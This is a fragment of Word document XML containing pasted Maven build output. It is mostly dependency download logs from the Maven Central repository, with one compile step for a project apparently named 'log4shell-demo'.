    <w:p w14:paraId="5498C1E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https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-build-api/0.0.7/plexus-build-api-0.0.7.pom (3.2 kB at 134 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03536F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https://repo.maven.apache.org/maven2/org/sonatype/spice/spice-parent/15/spice-parent-15.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E168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https://repo.maven.apache.org/maven2/org/sonatype/spice/spice-parent/15/spice-parent-15.pom (8.4 kB at 363 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7EC1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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.5.8/plexus-utils-1.5.8.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E025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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.5.8/plexus-utils-1.5.8.pom (8.1 kB at 336 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F8A2E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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/2.0.2/plexus-2.0.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078D73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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/2.0.2/plexus-2.0.2.pom (12 kB at 580 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A6CF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https://repo.maven.apache.org/maven2/org/apache/commons/commons-lang3/3.8.1/commons-lang3-3.8.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12849B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https://repo.maven.apache.org/maven2/org/apache/commons/commons-lang3/3.8.1/commons-lang3-3.8.1.pom (28 kB at 1.0 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045B0C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https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/47/commons-parent-47.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EFE7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https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/47/commons-parent-47.pom (78 kB at 3.4 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159E828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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/3.1.0/maven-plugin-api-3.1.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D02DA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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/3.1.0/maven-artifact-3.1.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719853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https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/3.1.0/maven-core-3.1.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD8D5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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/3.1.0/maven-settings-3.1.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489131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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings-builder/3.1.0/maven-settings-builder-3.1.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051BB7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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/3.1.0/maven-artifact-3.1.0.jar (52 kB at 1.8 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134EF9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https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/3.1.0/maven-repository-metadata-3.1.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B4B73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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/3.1.0/maven-plugin-api-3.1.0.jar (50 kB at 1.3 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE6B1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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model-builder/3.1.0/maven-model-builder-3.1.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3CC4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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/3.1.0/maven-settings-3.1.0.jar (47 kB at 1.3 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2955AD1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https://repo.maven.apache.org/maven2/org/apache/maven/maven-aether-provider/3.1.0/maven-aether-provider-3.1.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DEC2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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings-builder/3.1.0/maven-settings-builder-3.1.0.jar (41 kB at 1.0 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC8F2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https://repo.maven.apache.org/maven2/org/eclipse/aether/aether-spi/0.9.0.M2/aether-spi-0.9.0.M2.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F9D22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https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/3.1.0/maven-repository-metadata-3.1.0.jar (30 kB at 654 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10010E2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https://repo.maven.apache.org/maven2/org/eclipse/aether/aether-impl/0.9.0.M2/aether-impl-0.9.0.M2.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1389713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https://repo.maven.apache.org/maven2/org/apache/maven/maven-aether-provider/3.1.0/maven-aether-provider-3.1.0.jar (60 kB at 1.1 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC8626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https://repo.maven.apache.org/maven2/org/eclipse/aether/aether-api/0.9.0.M2/aether-api-0.9.0.M2.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14730D9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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model-builder/3.1.0/maven-model-builder-3.1.0.jar (159 kB at 2.6 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDC1D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https://repo.maven.apache.org/maven2/org/eclipse/aether/aether-util/0.9.0.M2/aether-util-0.9.0.M2.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436405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https://repo.maven.apache.org/maven2/org/eclipse/aether/aether-spi/0.9.0.M2/aether-spi-0.9.0.M2.jar (18 kB at 260 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F34B99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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.10/plexus-utils-3.0.10.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C10D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https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/3.1.0/maven-core-3.1.0.jar (563 kB at 6.9 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2470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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.4.2/plexus-classworlds-2.4.2.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EA01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https://repo.maven.apache.org/maven2/org/eclipse/aether/aether-impl/0.9.0.M2/aether-impl-0.9.0.M2.jar (145 kB at 1.9 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3137210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https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-sec-dispatcher/1.3/plexus-sec-dispatcher-1.3.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFA99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https://repo.maven.apache.org/maven2/org/eclipse/aether/aether-api/0.9.0.M2/aether-api-0.9.0.M2.jar (134 kB at 1.6 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE857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https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-cipher/1.4/plexus-cipher-1.4.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6DD4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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.4.2/plexus-classworlds-2.4.2.jar (47 kB at 479 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067645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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/3.1.0/maven-model-3.1.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024F23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https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-sec-dispatcher/1.3/plexus-sec-dispatcher-1.3.jar (29 kB at 288 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311D395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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/2.0.0/plexus-component-annotations-2.0.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492E0F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https://repo.maven.apache.org/maven2/org/eclipse/aether/aether-util/0.9.0.M2/aether-util-0.9.0.M2.jar (134 kB at 1.3 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070D28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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.26/plexus-interpolation-1.26.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE9E7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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.10/plexus-utils-3.0.10.jar (231 kB at 2.2 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5A23D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https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.0.0.M2a/org.eclipse.sisu.plexus-0.0.0.M2a.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331E17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https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-cipher/1.4/plexus-cipher-1.4.jar (13 kB at 119 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246E967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https://repo.maven.apache.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418E3C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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/2.0.0/plexus-component-annotations-2.0.0.jar (4.2 kB at 34 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B89C3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https://repo.maven.apache.org/maven2/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4DDE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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.26/plexus-interpolation-1.26.jar (85 kB at 677 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6BD2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https://repo.maven.apache.org/maven2/javax/inject/javax.inject/1/javax.inject-1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066EA94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https://repo.maven.apache.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.jar (45 kB at 333 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6137E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https://repo.maven.apache.org/maven2/com/google/guava/guava/10.0.1/guava-10.0.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AA5F5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https://repo.maven.apache.org/maven2/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.jar (5.8 kB at 40 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D18CF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https://repo.maven.apache.org/maven2/com/google/code/findbugs/jsr305/1.3.9/jsr305-1.3.9.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE2BF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https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.0.0.M2a/org.eclipse.sisu.plexus-0.0.0.M2a.jar (202 kB at 1.4 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D9E50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https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-guice/3.1.0/sisu-guice-3.1.0-no_aop.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6633E8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https://repo.maven.apache.org/maven2/javax/inject/javax.inject/1/javax.inject-1.jar (2.5 kB at 17 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7064AD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https://repo.maven.apache.org/maven2/aopalliance/aopalliance/1.0/aopalliance-1.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61635F5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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/3.1.0/maven-model-3.1.0.jar (164 kB at 1.1 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4DEB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https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.0.0.M2a/org.eclipse.sisu.inject-0.0.0.M2a.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14458F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https://repo.maven.apache.org/maven2/com/google/code/findbugs/jsr305/1.3.9/jsr305-1.3.9.jar (33 kB at 185 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAF1C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https://repo.maven.apache.org/maven2/asm/asm/3.3.1/asm-3.3.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EA732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https://repo.maven.apache.org/maven2/aopalliance/aopalliance/1.0/aopalliance-1.0.jar (4.5 kB at 25 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184F91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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-filtering/3.2.0/maven-filtering-3.2.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F92A2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https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.0.0.M2a/org.eclipse.sisu.inject-0.0.0.M2a.jar (202 kB at 1.0 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777ABB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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.3.3/maven-shared-utils-3.3.3.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A67B67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https://repo.maven.apache.org/maven2/asm/asm/3.3.1/asm-3.3.1.jar (44 kB at 220 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D103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https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-build-api/0.0.7/plexus-build-api-0.0.7.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688E64C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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-filtering/3.2.0/maven-filtering-3.2.0.jar (52 kB at 249 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BC9C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https://repo.maven.apache.org/maven2/commons-io/commons-io/2.6/commons-io-2.6.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CBD6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https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-build-api/0.0.7/plexus-build-api-0.0.7.jar (8.5 kB at 39 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDE9E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https://repo.maven.apache.org/maven2/org/apache/commons/commons-lang3/3.8.1/commons-lang3-3.8.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30861E9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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.3.3/maven-shared-utils-3.3.3.jar (154 kB at 697 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24502FB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https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-guice/3.1.0/sisu-guice-3.1.0-no_aop.jar (357 kB at 1.6 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334272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https://repo.maven.apache.org/maven2/commons-io/commons-io/2.6/commons-io-2.6.jar (215 kB at 863 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173F5E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https://repo.maven.apache.org/maven2/com/google/guava/guava/10.0.1/guava-10.0.1.jar (1.5 MB at 5.3 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750B4A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https://repo.maven.apache.org/maven2/org/apache/commons/commons-lang3/3.8.1/commons-lang3-3.8.1.jar (502 kB at 1.8 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D34AAB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7885450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2BB714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2999B0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080904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5D09B4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maven-compiler-plugin:3.8.1:compile (default-compile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584CCA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https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/3.0/maven-core-3.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150A65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https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/3.0/maven-core-3.0.pom (6.6 kB at 316 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEDDC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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/3.0/maven-settings-3.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2231EA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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/3.0/maven-settings-3.0.pom (1.9 kB at 72 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700B95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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings-builder/3.0/maven-settings-builder-3.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077E7C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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings-builder/3.0/maven-settings-builder-3.0.pom (2.2 kB at 97 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A79B4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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.14/plexus-interpolation-1.14.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0D7E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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.14/plexus-interpolation-1.14.pom (910 B at 46 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BE51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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-components/1.1.18/plexus-components-1.1.18.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4E61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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-components/1.1.18/plexus-components-1.1.18.pom (5.4 kB at 214 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF03D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https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/3.0/maven-repository-metadata-3.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8473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https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/3.0/maven-repository-metadata-3.0.pom (1.9 kB at 88 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665F57B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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model-builder/3.0/maven-model-builder-3.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B49F1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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model-builder/3.0/maven-model-builder-3.0.pom (2.2 kB at 112 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1647CAC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https://repo.maven.apache.org/maven2/org/apache/maven/maven-aether-provider/3.0/maven-aether-provider-3.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3B59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https://repo.maven.apache.org/maven2/org/apache/maven/maven-aether-provider/3.0/maven-aether-provider-3.0.pom (2.5 kB at 124 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED47EB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https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-api/1.7/aether-api-1.7.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090D62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https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-api/1.7/aether-api-1.7.pom (1.7 kB at 84 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617E5D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https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-parent/1.7/aether-parent-1.7.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C3CF7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https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-parent/1.7/aether-parent-1.7.pom (7.7 kB at 368 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFA5C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https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-util/1.7/aether-util-1.7.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CBA4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https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-util/1.7/aether-util-1.7.pom (2.1 kB at 98 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47604F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https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-impl/1.7/aether-impl-1.7.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CEFD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https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-impl/1.7/aether-impl-1.7.pom (3.7 kB at 194 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E526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https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-spi/1.7/aether-spi-1.7.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290A0A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https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-spi/1.7/aether-spi-1.7.pom (1.7 kB at 87 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0151E9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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-incremental/1.1/maven-shared-incremental-1.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E78F2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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-incremental/1.1/maven-shared-incremental-1.1.pom (4.7 kB at 237 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FD030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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/19/maven-shared-components-19.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45691A2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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/19/maven-shared-components-19.pom (6.4 kB at 318 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1C128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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/2.2.1/maven-plugin-api-2.2.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFF4A7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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/2.2.1/maven-plugin-api-2.2.1.pom (1.5 kB at 66 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD787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https://repo.maven.apache.org/maven2/org/apache/maven/maven/2.2.1/maven-2.2.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7676FB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https://repo.maven.apache.org/maven2/org/apache/maven/maven/2.2.1/maven-2.2.1.pom (22 kB at 1.0 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9CD17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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/11/maven-parent-11.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141DD2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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/11/maven-parent-11.pom (32 kB at 1.1 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571E588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https://repo.maven.apache.org/maven2/org/apache/apache/5/apache-5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4237A82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https://repo.maven.apache.org/maven2/org/apache/apache/5/apache-5.pom (4.1 kB at 205 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C39FF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https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/2.2.1/maven-core-2.2.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081791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https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/2.2.1/maven-core-2.2.1.pom (12 kB at 612 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4030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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/2.2.1/maven-settings-2.2.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3886C5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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/2.2.1/maven-settings-2.2.1.pom (2.2 kB at 109 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2558CA4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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/2.2.1/maven-model-2.2.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A547A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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/2.2.1/maven-model-2.2.1.pom (3.2 kB at 162 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EE69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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.5.15/plexus-utils-1.5.15.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5664BE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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.5.15/plexus-utils-1.5.15.pom (6.8 kB at 360 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EF883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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.11/plexus-interpolation-1.11.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4A2B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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.11/plexus-interpolation-1.11.pom (889 B at 47 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716765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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-components/1.1.14/plexus-components-1.1.14.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A7AE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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-components/1.1.14/plexus-components-1.1.14.pom (5.8 kB at 292 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DC1E5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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-parameter-documenter/2.2.1/maven-plugin-parameter-documenter-2.2.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C858C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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-parameter-documenter/2.2.1/maven-plugin-parameter-documenter-2.2.1.pom (2.0 kB at 89 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5FBB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https://repo.maven.apache.org/maven2/org/slf4j/slf4j-jdk14/1.5.6/slf4j-jdk14-1.5.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BAEB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https://repo.maven.apache.org/maven2/org/slf4j/slf4j-jdk14/1.5.6/slf4j-jdk14-1.5.6.pom (1.9 kB at 95 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDE79D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https://repo.maven.apache.org/maven2/org/slf4j/slf4j-parent/1.5.6/slf4j-parent-1.5.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F422C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https://repo.maven.apache.org/maven2/org/slf4j/slf4j-parent/1.5.6/slf4j-parent-1.5.6.pom (7.9 kB at 396 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE76D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https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.5.6/slf4j-api-1.5.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285C25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https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.5.6/slf4j-api-1.5.6.pom (3.0 kB at 130 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722654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https://repo.maven.apache.org/maven2/org/slf4j/jcl-over-slf4j/1.5.6/jcl-over-slf4j-1.5.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4391EB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https://repo.maven.apache.org/maven2/org/slf4j/jcl-over-slf4j/1.5.6/jcl-over-slf4j-1.5.6.pom (2.2 kB at 114 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500203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https://repo.maven.apache.org/maven2/org/apache/maven/maven-profile/2.2.1/maven-profile-2.2.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783AE72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https://repo.maven.apache.org/maven2/org/apache/maven/maven-profile/2.2.1/maven-profile-2.2.1.pom (2.2 kB at 94 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C1B0B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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/2.2.1/maven-artifact-2.2.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA3FF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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/2.2.1/maven-artifact-2.2.1.pom (1.6 kB at 75 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618892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https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/2.2.1/maven-repository-metadata-2.2.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5C270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https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/2.2.1/maven-repository-metadata-2.2.1.pom (1.9 kB at 94 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5131B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https://repo.maven.apache.org/maven2/org/apache/maven/maven-error-diagnostics/2.2.1/maven-error-diagnostics-2.2.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EED50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https://repo.maven.apache.org/maven2/org/apache/maven/maven-error-diagnostics/2.2.1/maven-error-diagnostics-2.2.1.pom (1.7 kB at 85 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012ED9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https://repo.maven.apache.org/maven2/org/apache/maven/maven-project/2.2.1/maven-project-2.2.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4EF5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https://repo.maven.apache.org/maven2/org/apache/maven/maven-project/2.2.1/maven-project-2.2.1.pom (2.8 kB at 132 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5923B1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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact-manager/2.2.1/maven-artifact-manager-2.2.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4953EC8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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact-manager/2.2.1/maven-artifact-manager-2.2.1.pom (3.1 kB at 141 kB/s)</w:t>
      </w:r>
    </w:p>
